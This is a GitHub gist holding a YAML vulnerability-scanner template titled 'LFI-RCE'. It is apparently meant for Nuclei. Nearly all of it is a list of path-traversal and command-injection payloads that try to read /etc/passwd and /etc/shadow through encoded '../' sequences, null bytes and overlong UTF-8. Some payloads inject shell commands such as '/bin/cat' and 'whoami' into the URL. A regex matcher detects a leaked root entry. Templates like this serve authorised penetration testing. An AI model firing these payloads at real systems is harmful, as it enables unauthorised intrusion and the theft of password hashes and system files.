Skip to content

Instantly share code, notes, and snippets.

@0x240x23elu
Last active December 12, 2023 02:14
Show Gist options
  • Save 0x240x23elu/aa975122312be3e66fe807c43b4d957d to your computer and use it in GitHub Desktop.
Save 0x240x23elu/aa975122312be3e66fe807c43b4d957d to your computer and use it in GitHub Desktop.
LFI-RCE
id: LFI-RCE
info:
name: LFI Detection
author: 0x240x23elu & payloadallthings
severity: High
requests:
- method: GET
path:
- "{{BaseURL}}../../../../etc/passwd"
- "{{BaseURL}}../../../../../../../../../etc/passwd"
- "{{BaseURL}}../../../../../../../../etc/passwd"
- "{{BaseURL}}../../../../../../../etc/passwd"
- "{{BaseURL}}../../../../../../etc/passwd"
- "{{BaseURL}}../../../../../etc/passwd"
- "{{BaseURL}}../../../../etc/passwd"
- "{{BaseURL}}..;/../../../../../../../../etc/passwd"
- "{{BaseURL}}..;/../../../../../../../etc/passwd"
- "{{BaseURL}}..;/../../../../../../etc/passwd"
- "{{BaseURL}}..;/../../../../../etc/passwd"
- "{{BaseURL}}..;/../../../../etc/passwd"
- "{{BaseURL}}..;/../../../etc/passwd"
- "{{BaseURL}}..;/../../etc/passwd"
- "{{BaseURL}}..;/../../etc/passwd"
- "{{BaseURL}}../../../../../../../../../../../../etc/passwd%00"
- "{{BaseURL}}../../../../../../../../../../../../etc/passwd"
- "{{BaseURL}}../../../../../../../../../../../../etc/shadow%00"
- "{{BaseURL}}../../../../../../../../../../../../etc/shadow"
- "{{BaseURL}}/../../../../../../../../../../etc/passwd^^"
- "{{BaseURL}}/../../../../../../../../../../etc/shadow^^"
- "{{BaseURL}}/../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/../../../../../../../../../../etc/shadow"
- "{{BaseURL}}/./././././././././././etc/passwd"
- "{{BaseURL}}/./././././././././././etc/shadow"
- "{{BaseURL}}%0a/bin/cat%20/etc/passwd"
- "{{BaseURL}}%0a/bin/cat%20/etc/shadow"
- "{{BaseURL}}%00/etc/passwd%00"
- "{{BaseURL}}%00/etc/shadow%00"
- "{{BaseURL}}%00../../../../../../etc/passwd"
- "{{BaseURL}}%00../../../../../../etc/shadow"
- "{{BaseURL}}/../../../../../../../../../../../etc/passwd%00.jpg"
- "{{BaseURL}}/../../../../../../../../../../../etc/passwd%00.html"
- "{{BaseURL}}/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd"
- "{{BaseURL}}/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow"
- "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
- "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow"
- "{{BaseURL}}%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00"
- "{{BaseURL}}/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00"
- "{{BaseURL}}%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%"
- "{{BaseURL}}\\'/bin/cat%20/etc/passwd\\'"
- "{{BaseURL}}\\'/bin/cat%20/etc/shadow\\'"
- "{{BaseURL}}cat+ ../../../../../../../../../etc/passwd"
- "{{BaseURL}}cat+ ../../../../../../../../etc/passwd"
- "{{BaseURL}}cat+ ../../../../../../../etc/passwd"
- "{{BaseURL}}cat+ ../../../../../../etc/passwd"
- "{{BaseURL}}cat+ ../../../../../etc/passwd"
- "{{BaseURL}}cat+ ../../../../etc/passwd"
- "{{BaseURL}}whoami"
- "{{BaseURL}}cat ../../../../../../../../../etc/passwd"
- "{{BaseURL}}cat ../../../../../../../../etc/passwd"
- "{{BaseURL}}cat ../../../../../../../etc/passwd"
- "{{BaseURL}}cat ../../../../../../etc/passwd"
- "{{BaseURL}}cat ../../../../../etc/passwd"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment